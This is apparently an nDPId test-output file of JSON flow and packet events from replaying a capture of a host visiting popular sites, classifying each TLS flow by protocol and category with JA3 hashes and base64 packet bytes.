+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} +01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} +01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 